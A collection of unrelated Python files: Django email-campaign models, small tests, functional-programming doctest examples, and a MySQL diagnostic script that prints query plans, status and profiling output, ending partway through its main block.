class Campaign(models.Model):
name = models.CharField(max_length=200, null=True)
sender_name = models.CharField(max_length=200, null=True)
sender_email = models.CharField(max_length=200, null=True)
email_subject = models.CharField(max_length=200, null=True)
my_customer = models.ForeignKey(Customer, null=True, on_delete=models.SET_NULL, related_name='mycustomer')
camp_emails = models.ForeignKey(Email, null=True, on_delete=models.SET_NULL, related_name='camp_email')
def __str__(self):
return self.name
class CampMail(models.Model):
campaignings = models.OneToOneField(Campaign, null=True, on_delete=models.CASCADE)
name = models.CharField(max_length=200, null=True)
camp = models.ManyToManyField(Email, related_name='emailings', null=True,blank=True)
def __str__(self):
return self.name
|
__author__ = 'Evgeny Demchenko'
__email__ = 'little_pea@list.ru'
__version__ = '0.1.0'
|
from task_selector.task import Task
def test_initializer():
task = Task("a", ["1"], 1)
assert isinstance(task, Task)
assert task.profit == 1.0
assert isinstance(task.profit, float)
assert len(task.resources) == 1
def test_equality():
task = Task("a", ["1", "5", "8"], 1)
task2 = Task("a", ["8", "5", "1"], 1.0)
assert task == task2
|
'''This progamr takes a single integer as
input and returns the sum of the integers from zero to the input parameter'''
def addGivenInput(n):
try:
result = sum(range(n + 1))
except TypeError:
result = "this is not valid postive number"
return result
print(addGivenInput(5))
print("***************")
print(addGivenInput(-0.1))
|
#!/usr/bin/env python3
"""Functional Python Programming
Chapter 13, Example Set 1
"""
# pylint: disable=unused-wildcard-import,wrong-import-position,unused-import
from typing import Iterable
from functools import reduce
def prod(data: Iterable[int]) -> int:
"""
>>> prod((1,2,3))
6
"""
return reduce(lambda x, y: x*y, data, 1)
year_cheese = [
(2000, 29.87), (2001, 30.12), (2002, 30.6), (2003, 30.66),
(2004, 31.33), (2005, 32.62), (2006, 32.73), (2007, 33.5),
(2008, 32.84), (2009, 33.02), (2010, 32.92)
]
from typing import Callable, Sequence, TypeVar
T_ = TypeVar("T_")
fst: Callable[[Sequence[T_]], T_] = lambda x: x[0]
snd: Callable[[Sequence[T_]], T_] = lambda x: x[1]
x = min(year_cheese, key=snd)
test_itemgetter = """
>>> from operator import itemgetter
>>> itemgetter(0)([1, 2, 3])
1
>>> min(year_cheese, key=snd)
(2000, 29.87)
>>> max(year_cheese, key=itemgetter(1))
(2007, 33.5)
"""
# from collections import namedtuple
# YearCheese = namedtuple( "YearCheese", ("year", "cheese") )'
from typing import NamedTuple
class YearCheese(NamedTuple):
year: int
cheese: float
year_cheese_2 = list(YearCheese(*yc) for yc in year_cheese)
test_year_cheese_2 = """
>>> year_cheese_2 # doctest: +NORMALIZE_WHITESPACE
[YearCheese(year=2000, cheese=29.87), YearCheese(year=2001, cheese=30.12),
YearCheese(year=2002, cheese=30.6), YearCheese(year=2003, cheese=30.66),
YearCheese(year=2004, cheese=31.33), YearCheese(year=2005, cheese=32.62),
YearCheese(year=2006, cheese=32.73), YearCheese(year=2007, cheese=33.5),
YearCheese(year=2008, cheese=32.84), YearCheese(year=2009, cheese=33.02),
YearCheese(year=2010, cheese=32.92)]
"""
test_attrgetter = """
>>> from operator import attrgetter
>>> min( year_cheese_2, key=attrgetter('cheese') )
YearCheese(year=2000, cheese=29.87)
>>> max( year_cheese_2, key=lambda x: x.cheese )
YearCheese(year=2007, cheese=33.5)
"""
g_f = [
1, 1/12, 1/288, -139/51840, -571/2488320, 163879/209018880,
5246819/75246796800
]
g = [
(1, 1), (1, 12), (1, 288), (-139, 51840),
(-571, 2488320), (163879, 209018880),
(5246819, 75246796800)
]
from itertools import starmap
from fractions import Fraction
test_starmap1 = """
>>> from operator import truediv
>>> round( sum( starmap( truediv, g ) ), 6 )
1.084749
>>> round( sum( g_f ), 6 )
1.084749
>>> f= sum( Fraction(*x) for x in g )
>>> f
Fraction(81623851739, 75246796800)
>>> round( float(f), 6 )
1.084749
"""
from itertools import zip_longest
test_starmap2 = """
>>> from operator import truediv
>>> p = (3, 8, 29, 44)
>>> d = starmap( pow, zip_longest([], range(4), fillvalue=60) )
>>> pi = sum( starmap( truediv, zip( p, d ) ) )
>>> pi
3.1415925925925925
>>> d = starmap( pow, zip_longest([], range(4), fillvalue=60) )
>>> pi = sum( map( truediv, p, d ) )
>>> pi
3.1415925925925925
"""
def fact(n: int) -> int:
"""
>>> fact(0)
1
>>> fact(1)
1
>>> fact(2)
2
>>> fact(3)
6
>>> fact(4)
24
"""
f = {
n == 0: lambda n: 1,
n == 1: lambda n: 1,
n == 2: lambda n: 2,
n > 2: lambda n: fact(n-1)*n
}[True]
return f(n)
from typing import Callable, Tuple, List
from operator import itemgetter
def semifact(n: int) -> int:
"""
>>> semifact(0)
1
>>> semifact(1)
1
>>> semifact(2)
2
>>> semifact(3)
3
>>> semifact(4)
8
>>> semifact(5)
15
>>> semifact(9)
945
"""
alternatives: List[Tuple[bool, Callable[[int], int]]] = [
(n == 0, lambda n: 1),
(n == 1, lambda n: 1),
(n == 2, lambda n: 2),
(n > 2, lambda n: semifact(n-2)*n)
]
_, f = next(filter(itemgetter(0), alternatives))
return f(n)
def semifact2(n: int) -> int:
"""
>>> semifact2(9)
945
"""
alternatives = [
(lambda n: 1) if n == 0 else None,
(lambda n: 1) if n == 1 else None,
(lambda n: 2) if n == 2 else None,
(lambda n: semifact2(n-2)*n) if n > 2 else None
]
f = next(filter(None, alternatives))
return f(n)
# Here's a "stub" definition for a class that includes
# the minimal feature set for comparison.
# These are often in a module in the `stubs` directory.
from abc import ABCMeta, abstractmethod
from typing import TypeVar, Any
# pylint: disable=pointless-statement,multiple-statements
class Rankable(metaclass=ABCMeta):
@abstractmethod
def __lt__(self, other: Any) -> bool: ...
@abstractmethod
def __gt__(self, other: Any) -> bool: ...
@abstractmethod
def __le__(self, other: Any) -> bool: ...
@abstractmethod
def __ge__(self, other: Any) -> bool: ...
RT = TypeVar('RT', bound=Rankable)
def non_strict_max(a: RT, b: RT) -> RT:
"""
>>> non_strict_max( 2, 2 )
2
>>> non_strict_max( 3, 5 )
5
>>> non_strict_max( 11, 7 )
11
"""
f = {a >= b: lambda: a, b >= a: lambda: b}[True]
return f()
test_starmap3 = """
>>> from itertools import count, takewhile
>>> from operator import truediv
>>> num = map(fact, count())
>>> den = map(semifact, (2*n+1 for n in count()))
>>> terms = takewhile(
... lambda t: t > 1E-15, map(truediv, num, den))
>>> round( float(2*sum(terms)), 8 )
3.14159265
"""
test_reduction = """
>>> import functools, operator
>>> sum= functools.partial( functools.reduce, operator.add )
>>> sum([1,2,3])
6
>>> prod = functools.partial( functools.reduce, operator.mul )
>>> prod( [1,2,3,4] )
24
>>> fact = lambda n: 1 if n < 2 else n*prod( range(1,n) )
>>> fact(4)
24
>>> fact(0)
1
>>> fact(1)
1
"""
test_unordered = """
>>> {'a': 1, 'a': 2}
{'a': 2}
"""
__test__ = {
"test_itemgetter": test_itemgetter,
"test_attrgetter": test_attrgetter,
"test_year_cheese_2": test_year_cheese_2,
"test_starmap1": test_starmap1,
"test_starmap2": test_starmap2,
"test_starmap3": test_starmap3,
"test_reduction": test_reduction,
"test_unordered": test_unordered,
}
def test():
import doctest
doctest.testmod(verbose=1)
if __name__ == "__main__":
test()
|
#!/usr/bin/python3
# ------------------------------------------------------------------------
# author : Shane.Qian#foxmail.com
# createdat : Wednesday, June 19, 2019 PM06:50:11 CST @ China
# ------------------------------------------------------------------------
# description : fmt mysql sql explain output with others info collection.
# ------------------------------------------------------------------------
import configparser
import datetime
import getopt
# import pprint
# import string
import sys
from warnings import filterwarnings
import MySQLdb
import sql_metadata
import sqlparse
from prettytable import PrettyTable
from sqlparse.sql import Identifier, IdentifierList
from sqlparse.tokens import DML, Keyword
filterwarnings('ignore', category=MySQLdb.Warning)
if sys.version > '3':
PY3PLUS = True
else:
PY3PLUS = False
SYS_PARM_FILTER = (
'BINLOG_CACHE_SIZE',
'BULK_INSERT_BUFFER_SIZE',
'HAVE_PARTITION_ENGINE',
'HAVE_QUERY_CACHE',
'INTERACTIVE_TIMEOUT',
'JOIN_BUFFER_SIZE',
'KEY_BUFFER_SIZE',
'KEY_CACHE_AGE_THRESHOLD',
'KEY_CACHE_BLOCK_SIZE',
'KEY_CACHE_DIVISION_LIMIT',
'LARGE_PAGES',
'LOCKED_IN_MEMORY',
'LONG_QUERY_TIME',
'MAX_ALLOWED_PACKET',
'MAX_BINLOG_CACHE_SIZE',
'MAX_BINLOG_SIZE',
'MAX_CONNECT_ERRORS',
'MAX_CONNECTIONS',
'MAX_JOIN_SIZE',
'MAX_LENGTH_FOR_SORT_DATA',
'MAX_SEEKS_FOR_KEY',
'MAX_SORT_LENGTH',
'MAX_TMP_TABLES',
'MAX_USER_CONNECTIONS',
'OPTIMIZER_PRUNE_LEVEL',
'OPTIMIZER_SEARCH_DEPTH',
'QUERY_CACHE_SIZE',
'QUERY_CACHE_TYPE',
'QUERY_PREALLOC_SIZE',
'RANGE_ALLOC_BLOCK_SIZE',
'READ_BUFFER_SIZE',
'READ_RND_BUFFER_SIZE',
'SORT_BUFFER_SIZE',
'SQL_MODE',
'TABLE_CACHE',
'THREAD_CACHE_SIZE',
'TMP_TABLE_SIZE',
'WAIT_TIMEOUT'
)
def print_table(p_title_list, p_data_list, p_align=[]):
x = PrettyTable(p_title_list)
x.padding_width = 1
for i in range(0, len(p_align)):
if p_align[i] == "l":
x.align[p_title_list[i]] = "l"
elif p_align[i] == "r":
x.align[p_title_list[i]] = "r"
else:
pass
for rec in p_data_list:
if not isinstance(rec, list):
rec = list(rec)
x.add_row(rec)
print(x)
def is_subselect(parsed):
if not parsed.is_group:
return False
for item in parsed.tokens:
if item.ttype is DML and item.value.upper() == 'SELECT':
return True
return False
def extract_from_part(parsed):
from_seen = False
for item in parsed.tokens:
# print item.ttype,item.value
if from_seen:
if is_subselect(item):
for x in extract_from_part(item):
yield x
elif item.ttype is Keyword:
raise StopIteration
else:
yield item
elif item.ttype is Keyword and item.value.upper() == 'FROM':
from_seen = True
def extract_table_identifiers(token_stream):
for item in token_stream:
if isinstance(item, IdentifierList):
for identifier in item.get_identifiers():
yield identifier.get_real_name()
elif isinstance(item, Identifier):
yield item.get_real_name()
# It's a bug to check for Keyword here, but in the example
# above some tables names are identified as keywords...
elif item.ttype is Keyword:
yield item.value
def extract_tables(p_sqltext):
stream = extract_from_part(sqlparse.parse(p_sqltext)[0])
return list(extract_table_identifiers(stream))
def f_find_in_list(myList, value):
try:
for v in range(0, len(myList)):
if value == myList[v]:
return 1
return 0
except BaseException:
return 0
def f_get_parm(p_dbinfo):
conn = MySQLdb.connect(host=p_dbinfo[0], port=int(p_dbinfo[1]), user=p_dbinfo[2], passwd=p_dbinfo[3], db=p_dbinfo[4])
cursor = conn.cursor()
try:
cursor.execute("select lower(variable_name),variable_value from INFORMATION_SCHEMA.GLOBAL_VARIABLES where upper(variable_name) in ('" + "','".join(list(SYS_PARM_FILTER)) + "') order by variable_name")
except BaseException:
cursor.execute("select lower(variable_name),variable_value from performance_schema.global_variables where upper(variable_name) in ('" + "','".join(list(SYS_PARM_FILTER)) + "') order by variable_name")
records = cursor.fetchall()
cursor.close()
conn.close()
return records
def f_print_parm(p_parm_result):
print("\033[1;31;40m%s\033[0m" % "===== SYSTEM PARAMETER =====")
v_data = []
for i in range(0, len(p_parm_result)):
if 'size' in p_parm_result[i][0]:
if int(p_parm_result[i][1]) >= 1024 * 1024 * 1024:
v_data.append([p_parm_result[i][0], str(round(int(p_parm_result[i][1]) / 1024 / 1024 / 1024, 2)) + ' G'])
elif int(p_parm_result[i][1]) >= 1024 * 1024:
v_data.append([p_parm_result[i][0], str(round(int(p_parm_result[i][1]) / 1024 / 1024, 2)) + ' M'])
elif int(p_parm_result[i][1]) >= 1024:
v_data.append([p_parm_result[i][0], str(round(int(p_parm_result[i][1]) / 1024, 2)) + ' K'])
else:
v_data.append([p_parm_result[i][0], p_parm_result[i][1] + ' B'])
else:
pass
print_table(['parameter_name', 'value'], v_data, ['l', 'r'])
print()
def f_get_optimizer_switch(p_dbinfo):
conn = MySQLdb.connect(host=p_dbinfo[0], port=int(p_dbinfo[1]), user=p_dbinfo[2], passwd=p_dbinfo[3], db=p_dbinfo[4])
cursor = conn.cursor()
try:
cursor.execute("select variable_value from INFORMATION_SCHEMA.GLOBAL_VARIABLES where upper(variable_name)='OPTIMIZER_SWITCH'")
except BaseException:
cursor.execute("select variable_value from performance_schema.global_variables where upper(variable_name)='OPTIMIZER_SWITCH'")
records = cursor.fetchall()
cursor.close()
conn.close()
result = []
for o in str(records[0][0]).split(','):
result.append([o.split('=')[0], o.split('=')[1]])
return result
def f_print_optimizer_switch(p_optimizer_switch_result):
print("\033[1;31;40m%s\033[0m" % "===== OPTIMIZER SWITCH =====")
print_table(['switch_name', 'value'], p_optimizer_switch_result, ['l', 'r'])
print()
def f_exec_sql(p_dbinfo, p_sqltext, p_option):
results = {}
conn = MySQLdb.connect(host=p_dbinfo[0], port=int(p_dbinfo[1]), user=p_dbinfo[2], passwd=p_dbinfo[3], db=p_dbinfo[4])
cursor = conn.cursor()
if f_find_in_list(p_option, 'STATUS'):
# cursor.execute("select concat(upper(left(variable_name,1)),substring(lower(variable_name),2,(length(variable_name)-1))) var_name,variable_value var_value from INFORMATION_SCHEMA.SESSION_STATUS where variable_name in('"+"','".join(tuple(SES_STATUS_ITEM))+"') order by 1")
try:
cursor.execute("select concat(upper(left(variable_name,1)),substring(lower(variable_name),2,(length(variable_name)-1))) var_name,variable_value var_value from INFORMATION_SCHEMA.SESSION_STATUS order by 1")
except BaseException:
cursor.execute("select concat(upper(left(variable_name,1)),substring(lower(variable_name),2,(length(variable_name)-1))) var_name,variable_value var_value from performance_schema.session_status order by 1")
records = cursor.fetchall()
results['BEFORE_STATUS'] = dict(records)
cursor.execute(p_sqltext)
cursor.execute("show status like 'Last_query_cost'")
records = cursor.fetchall()
results['LQC_STATUS'] = dict(records)
try:
cursor.execute("select concat(upper(left(variable_name,1)),substring(lower(variable_name),2,(length(variable_name)-1))) var_name,variable_value var_value from INFORMATION_SCHEMA.SESSION_STATUS order by 1")
except BaseException:
cursor.execute("select concat(upper(left(variable_name,1)),substring(lower(variable_name),2,(length(variable_name)-1))) var_name,variable_value var_value from performance_schema.session_status order by 1")
records = cursor.fetchall()
results['AFTER_STATUS'] = dict(records)
if f_find_in_list(p_option, 'PROFILING'):
cursor.execute("set profiling=1")
cursor.execute("select ifnull(max(query_id),0) from INFORMATION_SCHEMA.PROFILING")
records = cursor.fetchall()
# sq: had to run 'p_sqltext' 2 times each for status and profile
# sq: if it enabled -otherwise 'query_id' looks was not reliable
query_id = records[0][0] + 2 # skip (cur) to next sql
# print("query_id:"+str(query_id))
cursor.execute(p_sqltext)
# cursor.execute("show profiles")
# print_table(["query_id", "duration", "query"], cursor.fetchall())
cursor.execute("set profiling=0")
cursor.execute("select STATE,DURATION,CPU_USER,CPU_SYSTEM,BLOCK_OPS_IN,BLOCK_OPS_OUT ,MESSAGES_SENT ,MESSAGES_RECEIVED ,PAGE_FAULTS_MAJOR ,PAGE_FAULTS_MINOR ,SWAPS from INFORMATION_SCHEMA.PROFILING where query_id=" + str(query_id) + " order by seq")
records = cursor.fetchall()
results['PROFILING_DETAIL'] = records
cursor.execute("SELECT STATE,SUM(DURATION) AS Total_R,ROUND(100*SUM(DURATION)/(SELECT SUM(DURATION) FROM INFORMATION_SCHEMA.PROFILING WHERE QUERY_ID=" + str(query_id) + "),2) AS Pct_R,COUNT(*) AS Calls,SUM(DURATION)/COUNT(*) AS R_Call FROM INFORMATION_SCHEMA.PROFILING WHERE QUERY_ID=" + str(query_id) + " GROUP BY STATE ORDER BY Total_R DESC")
records = cursor.fetchall()
results['PROFILING_SUMMARY'] = records
cursor.close()
conn.close()
return results
def f_get_hit(p_dbinfo):
results = []
conn = MySQLdb.connect(host=p_dbinfo[0], port=int(p_dbinfo[1]), user=p_dbinfo[2], passwd=p_dbinfo[3], db=p_dbinfo[4])
cursor = conn.cursor()
# show engine innodb status
cursor.execute("""
SELECT concat(round(P1.variable_value/(P2.variable_value + P1.variable_value)*100, 4), '%'), P1.variable_value, P2.variable_value
FROM performance_schema.global_status P1, performance_schema.global_status P2
WHERE P1.variable_name = 'innodb_buffer_pool_read_requests' AND P2.variable_name = 'innodb_buffer_pool_reads'
""")
results = cursor.fetchall()
res_tmp = list(results[0])
cursor.execute("""
SELECT sec_to_time(variable_value)
FROM performance_schema.global_status
WHERE variable_name in ('uptime', 'uptime_since_flush_status')
""")
for r in cursor.fetchall():
res_tmp = res_tmp + [r[0], ]
cursor.execute("""
SELECT round(P1.variable_value/P2.variable_value, 2)
FROM performance_schema.global_status P1, performance_schema.global_status P2
WHERE P1.variable_name = 'questions' AND P2.variable_name = 'uptime'
""")
for r in cursor.fetchall():
res_tmp = res_tmp + [r[0], ]
# cursor.execute("""
# SELECT round((P1.variable_value + P2.variable_value)/P3.variable_value, 2), P1.variable_value, P2.variable_value
# FROM performance_schema.global_status P1, performance_schema.global_status P2, performance_schema.global_status P3
# WHERE P1.variable_name = 'com_commit' AND P2.variable_name = 'com_rollback' AND P2.variable_name = 'uptime'
# """)
# for r in cursor.fetchall():
# res_tmp = res_tmp + [r[0], r[1], r[2], ]
cursor.execute("show global status where variable_name in ('com_commit','com_rollback', 'uptime')")
c = []
for r in cursor.fetchall():
c = c + [int(r[1]), ]
res_tmp = res_tmp + [round((c[0] + c[1]) / c[2], 2), c[0], c[1], ]
cursor.execute("""
SELECT variable_value
FROM performance_schema.global_status
WHERE variable_name in ('threads_connected', 'threads_running')
""")
for r in cursor.fetchall():
res_tmp = res_tmp + [r[0], ]
cursor.close()
conn.close()
return (res_tmp,)
def f_print_hit(p_hit_data):
print("\033[1;31;40m%s\033[0m" % "===== HIT (GLOBAL) =====")
print_table(['hit', 'reqs', 'reads', 'uptime', 'uptime_since_flush_status', 'qps', 'tps', 'commit', 'rollback', 'threads_con', 'threads_run'], p_hit_data, ['l', 'r', 'r', 'r', 'r', 'r', 'r', 'r', 'r', 'r', 'r'])
print()
def f_print_extr(p_dbinfo):
results = []
conn = MySQLdb.connect(host=p_dbinfo[0], port=int(p_dbinfo[1]), user=p_dbinfo[2], passwd=p_dbinfo[3], db=p_dbinfo[4])
cursor = conn.cursor()
print("\033[1;31;40m%s\033[0m" % "===== EXTR (ACCOUNT) =====")
cursor.execute("show open tables where in_use != 0 or name_locked != 0")
print_table(['db', 'tab', 'in_use', 'name_locked'], cursor.fetchall(), ['l', 'r', 'r', 'r'])
cursor.execute("show global variables like '%lock%'")
print_table(['var', 'val'], cursor.fetchall(), ['l', 'r'])
cursor.execute("show full processlist") # note: privilege scope
print_table(['id', 'user', 'host', 'db', 'cmd', 'time', 'state', 'info'], cursor.fetchall(), ['l', 'r', 'r', 'r', 'r', 'r', 'r', 'r'])
print({"account": p_dbinfo[2]})
print()
cursor.close()
conn.close()
return results
def f_calc_status(p_before_status, p_after_status):
results = []
for key in sorted(p_before_status.keys()):
if p_before_status[key] != p_after_status[key]:
results.append([key, p_before_status[key], p_after_status[key], str(float(p_after_status[key]) - float(p_before_status[key]))])
return results
def f_print_status(p_status_data):
print("\033[1;31;40m%s\033[0m" % "===== SESSION STATUS (DIFFERENT) =====")
print_table(['status_name', 'before', 'after', 'diff'], p_status_data, ['l', 'r', 'r', 'r'])
print(exec_result['LQC_STATUS'])
print()
def f_print_time(p_title_additional, p_starttime, p_endtime):
print("\033[1;31;40m%s\033[0m" % ("===== EXECUTE TIME (" + str.rstrip(p_title_additional, '+') + ") ====="))
print(timediff(p_starttime, p_endtime))
print()
def f_print_profiling(p_profiling_detail, p_profiling_summary):
print("\033[1;31;40m%s\033[0m" % "===== SQL PROFILING (DETAIL) =====")
print_table(['state', 'duration', 'cpu_user', 'cpu_sys', 'bk_in', 'bk_out', 'msg_s', 'msg_r', 'p_f_ma', 'p_f_mi', 'swaps'], p_profiling_detail, ['l', 'r', 'r', 'r', 'r', 'r', 'r', 'r', 'r', 'r', 'r'])
print('bk_in: block_ops_in')
print('bk_out: block_ops_out')
print('msg_s: message sent')
print('msg_r: message received')
print('p_f_ma: page_faults_major')
print('p_f_mi: page_faults_minor')
print()
print("\033[1;31;40m%s\033[0m" % "===== SQL PROFILING (SUMMARY) =====")
print_table(['state', 'total_r', 'pct_r', 'calls', 'r/call'], p_profiling_summary, ['l', 'r', 'r', 'r', 'r'])
print()
def f_get_sqlplan(p_dbinfo, p_sqltext):
results = {}
db = MySQLdb.connect(host=p_dbinfo[0], port=int(p_dbinfo[1]), user=p_dbinfo[2], passwd=p_dbinfo[3], db=p_dbinfo[4])
cursor = db.cursor()
# 'EXTENDED' IS deprecated.
# # cursor.execute("explain extended " + p_sqltext)
cursor.execute("explain " + p_sqltext)
records = cursor.fetchall()
results['SQLPLAN'] = records
cursor.execute("show warnings")
records = cursor.fetchall()
results['WARNING'] = records
cursor.close()
db.close()
return results
def f_null(p_value):
if not p_value:
return ''
def f_print_sqlplan(p_sqlplan, p_warning, p_mysql_version):
# plan_title = ('id', 'select_type', 'table', 'type', 'possible_keys', 'key', 'key_len', 'ref', 'rows', 'filtered', 'Extra')
print("\033[1;31;40m%s\033[0m" % "===== SQL PLAN =====")
ver_maj = int(p_mysql_version.split('.')[0])
ver_min = int(p_mysql_version.split('.')[1])
if (ver_maj == 5 and ver_min >= 7) or (ver_maj > 5): # >=5.7
print_table(['id', 'select_type', 'table', 'partitions', 'type', 'possible_keys', 'key', 'key_len', 'ref', 'rows', 'filtered', 'Extra'], p_sqlplan, ['r', 'l', 'l', 'l', 'l', 'l', 'l', 'l', 'l', 'r', 'r', 'l'])
else:
print_table(['id', 'select_type', 'table', 'type', 'possible_keys', 'key', 'key_len', 'ref', 'rows', 'filtered', 'Extra'], p_sqlplan, ['r', 'l', 'l', 'l', 'l', 'l', 'l', 'l', 'r', 'r', 'l'])
print()
print("\033[1;31;40m%s\033[0m" % "===== OPTIMIZER REWRITE SQL =====")
for row in p_warning:
print(sqlparse.format(row[2], reindent=True, keyword_case='upper', strip_comments=True))
print()
def f_get_table(p_dbinfo, p_sqltext):
r_tables = []
db = MySQLdb.connect(host=p_dbinfo[0], port=int(p_dbinfo[1]), user=p_dbinfo[2], passwd=p_dbinfo[3], db=p_dbinfo[4])
cursor = db.cursor()
cursor.execute("explain " + p_sqltext)
rows = cursor.fetchall()
for row in rows:
table_name = row[2]
if '<' in table_name:
continue
if len(r_tables) == 0:
r_tables.append(table_name)
elif f_find_in_list(r_tables, table_name) == -1:
r_tables.append(table_name)
cursor.close()
db.close()
return r_tables
def f_get_tableinfo(p_dbinfo, p_tablename):
db = MySQLdb.connect(host=p_dbinfo[0], port=int(p_dbinfo[1]), user=p_dbinfo[2], passwd=p_dbinfo[3], db=p_dbinfo[4])
cursor = db.cursor()
# cursor.execute("select table_name,engine,row_format as format,table_rows,avg_row_length as avg_row,round((data_length+index_length)/1024/1024,2) as total_mb,round((data_length)/1024/1024,2) as data_mb,round((index_length)/1024/1024,2) as index_mb from information_schema.tables where table_schema='"+p_dbinfo[4]+"' and table_name='"+p_tablename+"'")
cursor.execute("select a.table_name,a.engine,a.row_format as format,a.table_rows,a.avg_row_length as avg_row,round((a.data_length+a.index_length)/1024/1024,2) as total_mb,round((a.data_length)/1024/1024,2) as data_mb,round((a.index_length)/1024/1024,2) as index_mb,a.create_time,b.last_update last_analyzed from information_schema.tables a ,mysql.innodb_table_stats b where a.table_schema=b.database_name and a.table_name=b.table_name and a.table_schema='" + p_dbinfo[4] + "' and a.table_name='" + p_tablename + "'")
records = cursor.fetchall()
cursor.close()
db.close()
return records
def f_print_tableinfo(p_table_stat):
print_table(['table_name', 'engine', 'format', 'table_rows', 'avg_row', 'total_mb', 'data_mb', 'index_mb', 'create_time', 'last_analyzed'], p_table_stat, ['l', 'l', 'l', 'r', 'r', 'r', 'r', 'r', 'c', 'c'])
def f_get_indexinfo(p_dbinfo, p_tablename):
db = MySQLdb.connect(host=p_dbinfo[0], port=int(p_dbinfo[1]), user=p_dbinfo[2], passwd=p_dbinfo[3], db=p_dbinfo[4])
cursor = db.cursor()
cursor.execute("select index_name,non_unique,seq_in_index,column_name,collation,cardinality,nullable,index_type from information_schema.statistics where table_schema='" + p_dbinfo[4] + "' and table_name='" + p_tablename + "' order by 1,3")
records = cursor.fetchall()
cursor.close()
db.close()
return records
def f_print_indexinfo(p_index_info):
if len(p_index_info) > 0:
print_table(['index_name', 'non_unique', 'seq_in_index', 'column_name', 'collation', 'cardinality', 'nullable', 'index_type'], p_index_info, ['l', 'r', 'r', 'l', '', 'r', 'r', 'l'])
def f_get_indexstat(p_dbinfo, p_tablename):
db = MySQLdb.connect(host=p_dbinfo[0], port=int(p_dbinfo[1]), user=p_dbinfo[2], passwd=p_dbinfo[3], db=p_dbinfo[4])
cursor = db.cursor()
cursor.execute("select index_name,last_update last_analyzed,stat_name,stat_value,sample_size,stat_description from mysql.innodb_index_stats a where database_name='" + p_dbinfo[4] + "' and table_name='" + p_tablename + "' order by index_name,stat_name")
records = cursor.fetchall()
cursor.close()
db.close()
return records
def f_print_indexstat(p_index_stat):
if len(p_index_stat) > 0:
print_table(['index_name', 'last_analyzed', 'stat_name', 'stat_value', 'sample_size', 'stat_description'], p_index_stat, ['l', 'c', 'l', 'r', 'r', 'l'])
def f_get_mysql_version(p_dbinfo):
db = MySQLdb.connect(host=p_dbinfo[0], port=int(p_dbinfo[1]), user=p_dbinfo[2], passwd=p_dbinfo[3], db=p_dbinfo[4])
cursor = db.cursor()
cursor.execute("select @@version")
records = cursor.fetchall()
cursor.close()
db.close()
return records[0][0]
def f_print_title(p_dbinfo, p_mysql_version):
print()
print('*' * 100)
print('*', 'thinks for using - mysql sql exfmt tool - Shane.Qian#foxmail.com'.center(96), '*')
print('*' * 100)
print()
print("\033[1;31;40m%s\033[0m" % "===== BASIC INFORMATION =====")
print_table(['server_ip', 'server_port', 'user_name', 'db_name', 'db_version'], [[p_dbinfo[0], p_dbinfo[1], p_dbinfo[2], p_dbinfo[4], p_mysql_version]])
print()
def f_print_orisql(p_sqltext):
print("\033[1;31;40m%s\033[0m" % "===== ORIGINAL SQL TEXT =====")
print(sqlparse.format(p_sqltext, reindent=True, keyword_case='upper'))
print()
def timediff(timestart, timestop):
t = (timestop - timestart)
time_day = t.days
s_time = t.seconds
ms_time = t.microseconds / 1000000
usedtime = int(s_time + ms_time)
time_hour = usedtime / 60 / 60
time_minute = (usedtime - time_hour * 3600) / 60
time_second = usedtime - time_hour * 3600 - time_minute * 60
time_micsecond = (t.microseconds - t.microseconds / 1000000) / 1000
retstr = "%d day %d hour %d minute %d second %d microsecond " % (time_day, time_hour, time_minute, time_second, time_micsecond)
return retstr
def readfs(fsname):
if not fsname.strip():
return ""
with open(fsname) as f:
return ''.join(f.readlines())
def usage():
print("""usage:
%s -p [config_ini] { -s [sql] | -f [sql_file] }
""" % sys.argv[0])
if __name__ == "__main__":
if not PY3PLUS:
print("\033[1;31;40m%s\033[0m" % "ERR: this tool was recommended to use python3 !")
sys.exit(2)
if len(sys.argv) != 5:
usage()
sys.exit(1)
dbinfo = ["", "", "", "", ""] # dbhost,dbport,dbuser,dbpwd,dbname
sqltext = ""
option = []
config_file = ""
mysql_version = ""
opts, args = getopt.getopt(sys.argv[1:], "p:s:f:")
for o, v in opts:
# XXX: socket ?
if o == "-p":
config_file = v
elif o == "-s":
sqltext = v
elif o == "-f":
sqltext = readfs(v)
if config_file == "" or sqltext == "":
usage()
sys.exit(1)
# if sqlparse.sql.Statement(sql_metadata.get_query_tokens(sqltext)).get_type() != 'SELECT':
# if sqlparse.sql.Statement(sqlparse.parse(sqltext)[0].tokens).get_type() != 'SELECT':
# shane: 'with' (CTE) starts from v8 and/or perhaps parsed as 'UNKNOWN' somehow..
tmpss = sqlparse.parse(sqltext)
if len(tmpss) > 1 or tmpss[0].get_type() != 'SELECT':
print(sqltext)
tmps = input('-- pls check/confirm sql was safe/correct to exec ?! [y/n] : ')
if str.strip(tmps) != 'y':
print("\033[1;31;40m%s\033[0m" % "WRN: [Reminder] should be dangerous or meaningless if to explain/exec not-dml/select-sql !")
sys.exit(3)
config = configparser.ConfigParser()
config.read_file(open(config_file, "rt"))
dbinfo[0] = config.get("database", "server_ip")
dbinfo[1] = config.get("database", "server_port")
dbinfo[2] = config.get("database", "db_user")
dbinfo[3] = config.get("database", "db_pwd")
dbinfo[4] = config.get("database", "db_name")
mysql_version = f_get_mysql_version(dbinfo).split('-')[0]
f_print_title(dbinfo, mysql_version)
if config.get("option", "sys_parm") == 'ON':
parm_result = f_get_parm(dbinfo)
optimizer_switch_result = f_get_optimizer_switch(dbinfo)
f_print_parm(parm_result)
f_print_optimizer_switch(optimizer_switch_result)
f_print_orisql(sqltext)
table_list = []
if config.get("option", "sql_plan") == 'ON':
sqlplan_result = f_get_sqlplan(dbinfo, sqltext)
f_print_sqlplan(sqlplan_result['SQLPLAN'], sqlplan_result['WARNING'], mysql_version)
table_list = list(set([i[2] for i in sqlplan_result['SQLPLAN']]))
if config.get("option", "obj_stat") == 'ON':
print("\033[1;31;40m%s\033[0m" % "===== OBJECT STATISTICS =====")
# for table_name in table_list:
# for table_name in extract_tables(sqltext):
for table_name in sql_metadata.get_query_tables(sqltext):
f_print_tableinfo(f_get_tableinfo(dbinfo, table_name))
f_print_indexinfo(f_get_indexinfo(dbinfo, table_name))
f_print_indexstat(f_get_indexstat(dbinfo, table_name))
print()
if config.get("option", "ses_status") == 'ON':
option.append('STATUS')
if config.get("option", "sql_profile") == 'ON':
option.append('PROFILING')
if config.get("option", "ses_status") == 'ON' or config.get("option", "sql_profile") == 'ON':
exec_title_add = ""
starttime = datetime.datetime.now()
exec_result = f_exec_sql(dbinfo, sqltext, option)
endtime = datetime.datetime.now()
if config.get("option", "ses_status") == 'ON':
